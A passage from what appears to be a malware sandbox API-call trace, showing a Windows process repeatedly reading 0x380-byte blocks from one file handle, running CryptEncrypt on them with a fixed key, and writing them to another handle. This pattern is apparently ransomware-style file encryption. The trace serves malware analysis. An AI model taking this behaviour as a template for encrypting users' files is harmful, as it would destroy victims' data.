lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.193] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.194] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.194] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.195] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.196] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.196] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, 